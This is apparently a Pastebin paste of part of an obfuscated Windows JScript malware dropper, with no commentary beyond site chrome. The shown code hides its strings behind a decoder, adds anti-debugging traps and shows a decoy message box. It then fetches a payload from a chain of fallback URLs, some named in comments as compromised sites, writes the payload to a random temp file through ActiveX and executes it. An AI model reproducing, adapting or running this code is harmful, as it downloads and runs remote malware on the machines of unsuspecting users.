  284.     _0x2a45ee[decoder('0x11', '\x54\x78\x76\x49')] = decoder('0x12', '\x5b\x4c\x21\x64');
  285.     _0x2a45ee[decoder('0x13', '\x5b\x4c\x21\x64')] = function (_0x501552, _0x29e47f) {
  286.         return _0x501552 + _0x29e47f;
  287.     };
  288.     _0x2a45ee[decoder('0x14', '\x5b\x46\x39\x4d')] = function (_0x318188) {
  289.         return _0x318188();
  290.     };
  291.     _0x2a45ee[decoder('0x15', '\x24\x70\x43\x53')] = function (_0x3dc7d5, _0x644010, _0x5000ce) {
  292.         return _0x3dc7d5(_0x644010, _0x5000ce);
  293.     };
  294.     _0x2a45ee[decoder('0x16', '\x28\x79\x58\x43')] = decoder('0x17', '\x54\x78\x76\x49');
  295.     _0x2a45ee[decoder('0x18', '\x54\x4f\x67\x7a')] = decoder('0x19', '\x24\x30\x50\x65');
  296.     _0x2a45ee[decoder('0x1a', '\x26\x31\x56\x4b')] = function (_0x3f26a3, _0xf980df, _0x2c74ca) {
  297.         return _0x3f26a3(_0xf980df, _0x2c74ca);
  298.     };
  299.     _0x2a45ee[decoder('0x1b', '\x40\x24\x47\x30')] = decoder('0x1c', '\x26\x47\x21\x63'); //$virXF = "http://608design.com/mainto/6Cgy/"
  300.     _0x2a45ee[decoder('0x1d', '\x31\x5d\x41\x71')] = function (_0x1c04a1, _0x18b233, _0x57dfc4) {
  301.         return _0x1c04a1(_0x18b233, _0x57dfc4);
  302.     };
  303.     _0x2a45ee[decoder('0x1e', '\x35\x54\x37\x4e')] = decoder('0x1f', '\x31\x73\x43\x57'); //$vcJOZ = "https://cssshk.com/wp-admin/gz56/"
  304.     var _0x46fd93 = function () {
  305.         var _0x23499e = !![];
  306.         return function (_0x5a4553, _0x2c9e1c) {
  307.             var _0x4747c8 = _0x23499e ? function () {
  308.                 if (_0x2c9e1c) {
  309.                     var _0x14e2a4 = _0x2c9e1c[decoder('0x20', '\x64\x6f\x74\x73')](_0x5a4553, arguments);
  310.                     _0x2c9e1c = null;
  311.                     return _0x14e2a4;
  312.                 }
  313.             } : function () {
  314.             };
  315.             _0x23499e = ![];
  316.             return _0x4747c8;
  317.         };
  318.     }();
  319.     (function () {
  320.         var _0x35a3dc = {};
  321.         _0x35a3dc[decoder('0x21', '\x24\x65\x70\x67')] = _0x2a45ee.VkgRL;
  322.         _0x35a3dc[decoder('0x22', '\x38\x43\x5a\x49')] = _0x2a45ee.oCwsj;
  323.         _0x35a3dc[decoder('0x23', '\x68\x24\x79\x78')] = function (_0x4c2f0c, _0x2f2cd7) {
  324.             return _0x2a45ee.VSSET(_0x4c2f0c, _0x2f2cd7);
  325.         };
  326.         _0x35a3dc[decoder('0x24', '\x4c\x64\x6a\x4e')] = function (_0x999bb2, _0x46273e) {
  327.             return _0x999bb2(_0x46273e);
  328.         };
  329.         _0x35a3dc[decoder('0x25', '\x4c\x64\x6a\x4e')] = function (_0x1c0ae3) {
  330.             return _0x2a45ee.LjYaf(_0x1c0ae3);
  331.         };
  332.         _0x2a45ee[decoder('0x26', '\x4c\x64\x6a\x4e')](_0x46fd93, this, function () {
  333.             var _0x5101d4 = new RegExp(_0x35a3dc[decoder('0x27', '\x4f\x68\x35\x34')]);
  334.             var _0x2fa48c = new RegExp(decoder('0x28', '\x53\x6a\x70\x6f'), '\x69');
  335.             var _0x3f085c = _0x3e87a6(decoder('0x29', '\x59\x25\x6e\x42'));
  336.             if (!_0x5101d4[decoder('0x2a', '\x54\x78\x76\x49')](_0x3f085c + _0x35a3dc[decoder('0x2b', '\x5b\x4c\x21\x64')]) || !_0x2fa48c[decoder('0x2c', '\x34\x2a\x50\x41')](_0x35a3dc[decoder('0x2d', '\x56\x73\x6b\x54')](_0x3f085c, decoder('0x2e', '\x53\x6a\x70\x6f')))) {
  337.                 _0x35a3dc[decoder('0x2f', '\x4a\x5b\x55\x23')](_0x3f085c, '\x30');
  338.             } else {
  339.                 _0x35a3dc[decoder('0x30', '\x63\x37\x6d\x2a')](_0x3e87a6);
  340.             }
  341.         })();
  342.     }());
  343.     var _0x18f414 = function () {
  344.         var _0x245b55 = !![];
  345.         return function (_0x56080f, _0x18100a) {
  346.             var _0x1e3225 = _0x245b55 ? function () {
  347.                 if (_0x18100a) {
  348.                     var _0x17bd68 = _0x18100a[decoder('0x31', '\x56\x73\x6b\x54')](_0x56080f, arguments);
  349.                     _0x18100a = null;
  350.                     return _0x17bd68;
  351.                 }
  352.             } : function () {
  353.             };
  354.             _0x245b55 = ![];
  355.             return _0x1e3225;
  356.         };
  357.     }();
  358.     var _0x4e9df4 = _0x18f414(this, function () {
  359.         var _0x1053de = _0x2a45ee[decoder('0x32', '\x53\x6a\x70\x6f')][decoder('0x33', '\x68\x26\x40\x48')]('\x7c'), _0x25e780 = 0x0;
  360.         while (!![]) {
  361.             switch (_0x1053de[_0x25e780++]) {
  362.             case '\x30':
  363.                 var _0x31b100 = _0x2a45ee[decoder('0x34', '\x34\x2a\x50\x41')](_0x2c20cd);
  364.                 continue;
  365.             case '\x31':
  366.                 var _0x5a5fcc = {};
  367.                 _0x5a5fcc[decoder('0x35', '\x21\x54\x45\x4b')] = function (_0x3faa15, _0x5620c5) {
  368.                     return _0x3faa15(_0x5620c5);
  369.                 };
  370.                 _0x5a5fcc[decoder('0x36', '\x56\x73\x6b\x54')] = function (_0x15f1a1, _0x5768e7) {
  371.                     return _0x2a45ee.VSSET(_0x15f1a1, _0x5768e7);
  372.                 };
  373.                 continue;
  374.             case '\x32':
  375.                 var _0x2c20cd = function () {
  376.                     var _0x1e0e07;
  377.                     try {
  378.                         _0x1e0e07 = _0x5a5fcc[decoder('0x37', '\x56\x73\x6b\x54')](Function, _0x5a5fcc[decoder('0x38', '\x68\x6e\x50\x49')](_0x5a5fcc[decoder('0x39', '\x54\x78\x76\x49')](decoder('0x3a', '\x21\x54\x45\x4b'), decoder('0x3b', '\x68\x26\x40\x48')), '\x29\x3b'))();
  379.                     } catch (_0xc50881) {
  380.                         _0x1e0e07 = window;
  381.                     }
  382.                     return _0x1e0e07;
  383.                 };
  384.                 continue;
  385.             case '\x33':
  386.                 if (!_0x31b100[decoder('0x3c', '\x68\x6e\x50\x49')]) {
  387.                     _0x31b100[decoder('0x3d', '\x53\x6a\x70\x6f')] = function (_0x3356a7) {
  388.                         var _0x309bd5 = {};
  389.                         _0x309bd5[decoder('0x3e', '\x56\x73\x6b\x54')] = _0x3356a7;
  390.                         _0x309bd5[decoder('0x3f', '\x71\x5d\x29\x4c')] = _0x3356a7;
  391.                         _0x309bd5[decoder('0x40', '\x26\x66\x41\x26')] = _0x3356a7;
  392.                         _0x309bd5[decoder('0x41', '\x76\x78\x38\x5b')] = _0x3356a7;
  393.                         _0x309bd5[decoder('0x42', '\x76\x78\x38\x5b')] = _0x3356a7;
  394.                         _0x309bd5[decoder('0x43', '\x53\x6a\x70\x6f')] = _0x3356a7;
  395.                         _0x309bd5[decoder('0x44', '\x34\x78\x50\x47')] = _0x3356a7;
  396.                         return _0x309bd5;
  397.                     }(_0x49c512);
  398.                 } else {
  399.                     var _0x1a516f = _0x2a45ee[decoder('0x45', '\x34\x78\x50\x47')][decoder('0x46', '\x68\x6e\x50\x49')]('\x7c'), _0x1fee24 = 0x0;
  400.                     while (!![]) {
  401.                         switch (_0x1a516f[_0x1fee24++]) {
  402.                         case '\x30':
  403.                             _0x31b100[decoder('0x47', '\x26\x47\x21\x63')][decoder('0x48', '\x40\x24\x47\x30')] = _0x49c512;
  404.                             continue;
  405.                         case '\x31':
  406.                             _0x31b100[decoder('0x49', '\x63\x37\x6d\x2a')][decoder('0x4a', '\x28\x79\x58\x43')] = _0x49c512;
  407.                             continue;
  408.                         case '\x32':
  409.                             _0x31b100[decoder('0x3d', '\x53\x6a\x70\x6f')][decoder('0x4b', '\x73\x67\x55\x62')] = _0x49c512;
  410.                             continue;
  411.                         case '\x33':
  412.                             _0x31b100[decoder('0x4c', '\x68\x26\x40\x48')][decoder('0x4d', '\x59\x25\x6e\x42')] = _0x49c512;
  413.                             continue;
  414.                         case '\x34':
  415.                             _0x31b100[decoder('0x3c', '\x68\x6e\x50\x49')][decoder('0x4e', '\x62\x4d\x52\x73')] = _0x49c512;
  416.                             continue;
  417.                         case '\x35':
  418.                             _0x31b100[decoder('0x4f', '\x6a\x29\x21\x34')][decoder('0x50', '\x5b\x46\x39\x4d')] = _0x49c512;
  419.                             continue;
  420.                         case '\x36':
  421.                             _0x31b100[decoder('0x51', '\x76\x4c\x28\x5a')][decoder('0x52', '\x31\x5d\x41\x71')] = _0x49c512;
  422.                             continue;
  423.                         }
  424.                         break;
  425.                     }
  426.                 }
  427.                 continue;
  428.             case '\x34':
  429.                 var _0x49c512 = function () {
  430.                 };
  431.                 continue;
  432.             }
  433.             break;
  434.         }
  435.     });
  436.     _0x4e9df4();
  437.     try {
  438.         _0x2a45ee[decoder('0x53', '\x4e\x74\x4d\x5b')](getDataFromUrl, _0x2a45ee[decoder('0x54', '\x53\x6a\x70\x6f')], function (httpResponseBody, errorFlag) {
  439.             var _0x185f68 = {};
  440.             _0x185f68[decoder('0x55', '\x54\x6a\x6a\x34')] = function (_0x2a35f6, _0x3b43bf, _0x4266ed) {
  441.                 return _0x2a45ee.ebaVd(_0x2a35f6, _0x3b43bf, _0x4266ed);
  442.             };
  443.             _0x185f68[decoder('0x56', '\x5b\x46\x39\x4d')] = function (_0x4c990d, _0x39d7ab, _0x225650) {
  444.                 return _0x4c990d(_0x39d7ab, _0x225650);
  445.             };
  446.             _0x185f68[decoder('0x57', '\x34\x78\x50\x47')] = function (_0xef025d, _0x23bfc7, _0x3542ef) {
  447.                 return _0x2a45ee.sPKub(_0xef025d, _0x23bfc7, _0x3542ef);
  448.             };
  449.             _0x185f68[decoder('0x58', '\x4e\x74\x4d\x5b')] = _0x2a45ee.virXF;
  450.             if (!errorFlag) {
  451.                 return _0x2a45ee[decoder('0x59', '\x5b\x46\x39\x4d')](writeAndExecute, httpResponseBody, ![]);
  452.             } else {
  453.                 getDataFromUrl(decoder('0x5a', '\x26\x31\x56\x4b'), function (httpResponseBody, errorFlag) {
  454.                     if (!errorFlag) {
  455.                         return _0x185f68[decoder('0x5b', '\x24\x70\x43\x53')](writeAndExecute, httpResponseBody, ![]);
  456.                     } else {
  457.                         getDataFromUrl(_0x185f68[decoder('0x5c', '\x35\x54\x37\x4e')], function (httpResponseBody, errorFlag) {
  458.                             var _0x3a4f74 = {};
  459.                             _0x3a4f74[decoder('0x5d', '\x31\x73\x43\x57')] = function (_0x9b93a3, _0x520330, _0xd2c4ef) {
  460.                                 return _0x9b93a3(_0x520330, _0xd2c4ef);
  461.                             };
  462.                             _0x3a4f74[decoder('0x5e', '\x38\x43\x5a\x49')] = function (_0x54d8c7, _0x31b21a, _0x1f5b63) {
  463.                                 return _0x185f68.FpLFt(_0x54d8c7, _0x31b21a, _0x1f5b63);
  464.                             };
  465.                             if (!errorFlag) {
  466.                                 return _0x185f68[decoder('0x5f', '\x68\x24\x79\x78')](writeAndExecute, httpResponseBody, ![]);
  467.                             } else {
  468.                                 _0x185f68[decoder('0x60', '\x34\x78\x50\x47')](getDataFromUrl, decoder('0x61', '\x28\x79\x58\x43'), function (httpResponseBody, errorFlag) {
  469.                                     var _0x11ea16 = {};
  470.                                     _0x11ea16[decoder('0x62', '\x34\x78\x50\x47')] = function (_0x417728, _0x556bab, _0x1d9296) {
  471.                                         return _0x417728(_0x556bab, _0x1d9296);
  472.                                     };
  473.                                     if (!errorFlag) {
  474.                                         return _0x3a4f74[decoder('0x63', '\x45\x6f\x6a\x76')](writeAndExecute, httpResponseBody, ![]);
  475.                                     } else {
  476.                                         _0x3a4f74[decoder('0x64', '\x62\x4d\x52\x73')](getDataFromUrl, decoder('0x65', '\x5b\x4c\x21\x64'), function (httpResponseBody, errorFlag) {
  477.                                             if (!errorFlag) {
  478.                                                 return _0x11ea16[decoder('0x66', '\x4f\x68\x35\x34')](writeAndExecute, httpResponseBody, ![]);
  479.                                             } else {
  480.                                                 return _0x11ea16[decoder('0x67', '\x5b\x4c\x21\x64')](writeAndExecute, null, !![]);
  481.                                             }
  482.                                         });
  483.                                     }
  484.                                 });
  485.                             }
  486.                         });
  487.                     }
  488.                 });
  489.             }
  490.         });
  491.     } catch (e) {
  492.         return _0x2a45ee[decoder('0x68', '\x68\x24\x79\x78')](writeAndExecute, null, !![]);
  493.     }
  494. }
  495. function getTempFilePath() {
  496.     var _0x3bd4c9 = {};
  497.     _0x3bd4c9[decoder('0x69', '\x26\x47\x21\x63')] = decoder('0x6a', '\x45\x6f\x6a\x76');
  498.     _0x3bd4c9[decoder('0x6b', '\x6a\x29\x21\x34')] = function (_0x53e86b, _0x2c5ad8) {
  499.         return _0x53e86b + _0x2c5ad8;
  500.     };
  501.     _0x3bd4c9[decoder('0x6c', '\x5b\x4c\x21\x64')] = function (_0x351e95, _0x526a24) {
  502.         return _0x351e95 + _0x526a24;
  503.     };
  504.     try {
  505.         var FSO = new ActiveXObject(_0x3bd4c9[decoder('0x6d', '\x2a\x6d\x78\x6e')]);
  506.         var randomFileName = _0x3bd4c9[decoder('0x6e', '\x4c\x64\x6a\x4e')](_0x3bd4c9[decoder('0x6f', '\x71\x35\x67\x76')]('\x5c', Math[decoder('0x70', '\x6f\x70\x4e\x53')]()[decoder('0x71', '\x54\x78\x76\x49')](0x24)[decoder('0x72', '\x62\x4d\x52\x73')](0x2, 0x9)), decoder('0x73', '\x71\x5d\x29\x4c'));
  507.         var FQFP = FSO[decoder('0x74', '\x26\x31\x56\x4b')](0x2) + randomFileName;
  508.         return FQFP;
  509.     } catch (e) {
  510.         return ![];
  511.     }
  512. }
  513. function saveToTemp(_0x5f4192, runExe) {
  514.     var _0x338c92 = {};
  515.     _0x338c92[decoder('0x75', '\x6a\x29\x21\x34')] = function (_0x5a3de4) {
  516.         return _0x5a3de4();
  517.     };
  518.     _0x338c92[decoder('0x76', '\x24\x30\x50\x65')] = decoder('0x77', '\x26\x47\x21\x63');
  519.     _0x338c92[decoder('0x78', '\x24\x65\x70\x67')] = function (_0x107b3b, _0x37b2f5, _0x287715) {
  520.         return _0x107b3b(_0x37b2f5, _0x287715);
  521.     };
  522.     _0x338c92[decoder('0x79', '\x4e\x2a\x6d\x32')] = function (_0x4610db, _0x1e7d38, _0x38f352) {
  523.         return _0x4610db(_0x1e7d38, _0x38f352);
  524.     };
  525.     try {
  526.         var tempPath = _0x338c92[decoder('0x7a', '\x26\x47\x21\x63')](getTempFilePath);
  527.         if (tempPath) {
  528.             var _0x4719d2 = decoder('0x7b', '\x26\x66\x41\x26')[decoder('0x7c', '\x59\x25\x6e\x42')]('\x7c'), _0x427fda = 0x0;
  529.             while (!![]) {
  530.                 switch (_0x4719d2[_0x427fda++]) {
  531.                 case '\x30':
  532.                     newFileObject[decoder('0x7d', '\x62\x4d\x52\x73')](_0x5f4192);
  533.                     continue;
  534.                 case '\x31':
  535.                     newFileObject[decoder('0x7e', '\x4a\x5b\x55\x23')]();
  536.                     continue;
  537.                 case '\x32':
  538.                     newFileObject[decoder('0x7f', '\x73\x67\x55\x62')]();
  539.                     continue;
  540.                 case '\x33':
  541.                     var newFileObject = new ActiveXObject(_0x338c92[decoder('0x80', '\x63\x37\x6d\x2a')]);
  542.                     continue;
  543.                 case '\x34':
  544.                     newFileObject[decoder('0x81', '\x62\x4d\x52\x73')](tempPath, 0x2);
  545.                     continue;
  546.                 case '\x35':
  547.                     newFileObject[decoder('0x82', '\x4f\x68\x35\x34')] = 0x1;
  548.                     continue;
  549.                 case '\x36':
  550.                     newFileObject[decoder('0x83', '\x59\x25\x6e\x42')] = 0x0;
  551.                     continue;
  552.                 case '\x37':
  553.                     return _0x338c92[decoder('0x84', '\x5b\x46\x39\x4d')](runExe, tempPath, ![]);
  554.                 }
  555.                 break;
  556.             }
  557.         } else {
  558.             return _0x338c92[decoder('0x78', '\x24\x65\x70\x67')](runExe, null, !![]);
  559.         }
  560.     } catch (_0x21246b) {
  561.         return _0x338c92[decoder('0x85', '\x24\x70\x43\x53')](runExe, null, !![]);
  562.     }
  563. }
  564. getData(function (bytes, hasError) {
  565.     var _0x414874 = {};
  566.     _0x414874[decoder('0x86', '\x5b\x74\x5e\x54')] = decoder('0x87', '\x24\x70\x43\x53');
  567.     _0x414874[decoder('0x88', '\x5b\x4c\x21\x64')] = decoder('0x89', '\x24\x65\x70\x67');
  568.     WshShell = WScript[decoder('0x8a', '\x21\x54\x45\x4b')](decoder('0x8b', '\x24\x30\x50\x65'));
  569.     Text = decoder('0x8c', '\x4f\x68\x35\x34');
  570.     Title = _0x414874[decoder('0x8d', '\x6f\x70\x4e\x53')];
  571.     Res = WshShell[decoder('0x8e', '\x33\x44\x43\x70')](Text, 0x0, Title, 0x0 + 0x40);
  572.     if (!hasError) {
  573.         saveToTemp(bytes, function (fileToRun, stopFlag) {
  574.             if (!stopFlag) {
  575.                 try {
  576.                     var wsShell = new ActiveXObject(_0x414874[decoder('0x8f', '\x4f\x24\x43\x29')]);
  577.                     wsShell[decoder('0x90', '\x4c\x64\x6a\x4e')](fileToRun);
  578.                 } catch (e) {
  579.                 }
  580.             }
  581.         });
  582.     }
  583. });
  584. function _0x3e87a6(_0x3927ee) {
  585.     var _0xa49e00 = {};
  586.     _0xa49e00[decoder('0x91', '\x28\x79\x58\x43')] = decoder('0x92', '\x54\x6a\x6a\x34');
  587.     _0xa49e00[decoder('0x93', '\x35\x54\x37\x4e')] = decoder('0x94', '\x4e\x2a\x6d\x32');
  588.     _0xa49e00[decoder('0x95', '\x21\x54\x45\x4b')] = function (_0x3ff74f, _0x570ecb) {
  589.         return _0x3ff74f / _0x570ecb;
  590.     };
  591.     _0xa49e00[decoder('0x96', '\x71\x5d\x29\x4c')] = decoder('0x97', '\x34\x2a\x50\x41');
  592.     _0xa49e00[decoder('0x98', '\x63\x37\x6d\x2a')] = function (_0x30500c, _0x534308) {
  593.         return _0x30500c + _0x534308;
  594.     };
  595.     _0xa49e00[decoder('0x99', '\x4e\x2a\x6d\x32')] = decoder('0x9a', '\x45\x6f\x6a\x76');
  596.     _0xa49e00[decoder('0x9b', '\x63\x37\x6d\x2a')] = decoder('0x9c', '\x68\x26\x40\x48');
  597.     _0xa49e00[decoder('0x9d', '\x34\x2a\x50\x41')] = function (_0x1aba01, _0x20458e) {
  598.         return _0x1aba01(_0x20458e);
  599.     };
  600.     function _0x3605c7(_0x489ab9) {
  601.         if (typeof _0x489ab9 === decoder('0x9e', '\x2a\x6d\x78\x6e')) {
  602.             return function (_0x3a7fa3) {
  603.             }[decoder('0x9f', '\x34\x78\x50\x47')](_0xa49e00[decoder('0xa0', '\x2a\x6d\x78\x6e')])[decoder('0xa1', '\x34\x2a\x50\x41')](_0xa49e00[decoder('0xa2', '\x54\x6a\x6a\x34')]);
  604.         } else {
  605.             if (('' + _0xa49e00[decoder('0xa3', '\x28\x79\x58\x43')](_0x489ab9, _0x489ab9))[decoder('0xa4', '\x46\x4d\x5b\x40')] !== 0x1 || _0x489ab9 % 0x14 === 0x0) {
  606.                 (function () {
  607.                     return !![];
  608.                 }[decoder('0xa5', '\x34\x2a\x50\x41')](decoder('0xa6', '\x71\x35\x67\x76') + _0xa49e00[decoder('0xa7', '\x4f\x68\x35\x34')])[decoder('0xa8', '\x21\x54\x45\x4b')](decoder('0xa9', '\x28\x79\x58\x43')));
  609.             } else {
  610.                 (function () {
  611.                     return ![];
  612.                 }[decoder('0xaa', '\x64\x6f\x74\x73')](_0xa49e00[decoder('0xab', '\x4e\x74\x4d\x5b')](_0xa49e00[decoder('0xac', '\x68\x6e\x50\x49')], decoder('0xad', '\x4f\x68\x35\x34')))[decoder('0xae', '\x2a\x6d\x78\x6e')](_0xa49e00[decoder('0xaf', '\x24\x65\x70\x67')]));
  613.             }
  614.         }
  615.         _0x3605c7(++_0x489ab9);
  616.     }
  617.     try {
  618.         if (_0x3927ee) {
  619.             return _0x3605c7;
  620.         } else {
  621.             _0xa49e00[decoder('0xb0', '\x4a\x5b\x55\x23')](_0x3605c7, 0x0);
  622.         }
  623.     } catch (_0x45f4b4) {
  624.     }
  625. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!